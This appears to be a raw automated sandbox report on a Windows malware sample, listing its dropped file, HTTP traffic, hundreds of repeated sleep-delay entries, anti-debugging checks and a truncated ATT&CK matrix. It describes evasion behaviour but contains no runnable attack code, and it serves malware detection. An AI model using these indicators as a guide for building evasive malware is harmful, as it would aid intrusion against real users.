            Source: 0.3.BaGkRDSifo.exe.5734f52.0.raw.unpack, R2mIapWar4cwoqqx6Q.csHigh entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeFile created: C:\Users\user\Desktop\STHealthUpdate.exeJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 9876
            Source: unknownNetwork traffic detected: HTTP traffic on port 9876 -> 49701
            Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 9876
            Source: unknownNetwork traffic detected: HTTP traffic on port 9876 -> 49701
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeMemory allocated: 24E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeMemory allocated: 2EF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 599889Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 599446Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 599186Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598968Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598857Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598750Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597547Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597327Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597200Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596949Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596813Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596688Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596563Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596438Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596313Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596188Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595969Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595063Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594493Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594364Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594125Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594016Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 593891Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeWindow / User API: threadDelayed 3275Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeWindow / User API: threadDelayed 6527Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeDropped PE file which has not been started: C:\Users\user\Desktop\STHealthUpdate.exeJump to dropped file
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 4516Thread sleep time: -1844674407370954s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -12912720851596678s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -599889s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -599446s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -599328s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -599186s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -599078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -598968s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -598857s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -598750s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -598641s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -598531s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -598422s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -598312s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -598203s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -598094s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -597984s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -597875s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -597765s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -597656s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -597547s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -597437s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -597327s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -597200s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -597078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -596949s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -596813s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -596688s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -596563s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -596438s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -596313s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -596188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -596078s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -595969s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -595844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -595734s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -595625s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -595516s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -595406s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -595297s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -595188s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -595063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -594953s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -594844s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -594719s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -594609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -594493s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -594364s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -594235s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -594125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -594016s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 6820Thread sleep time: -593891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exe TID: 4516Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 599889Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 599446Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 599328Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 599186Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 599078Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598968Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598857Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598750Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598641Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598531Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598422Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598312Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598203Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 598094Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597984Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597875Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597765Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597656Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597547Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597437Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597327Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597200Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596949Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596813Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596688Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596563Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596438Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596313Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596188Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 596078Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595969Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595844Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595625Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595516Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595297Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595188Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 595063Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594844Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594719Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594609Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594493Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594364Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594235Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594125Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 594016Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 593891Jump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: BaGkRDSifo.exe, 00000000.00000002.2490141797.0000000005830000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeAPI call chain: ExitProcess graph end nodegraph_0-95026
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0040ADB0 GetProcessHeap,HeapFree,0_2_0040ADB0
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040CE09
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040E61C
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00416F6A
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_004123F1 SetUnhandledExceptionFilter,0_2_004123F1
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: GetLocaleInfoA,0_2_00417A20
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeCode function: 0_2_00412A15 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00412A15
            Source: C:\Users\user\Desktop\BaGkRDSifo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
            Command and Scripting Interpreter
            1
            DLL Side-Loading
            1
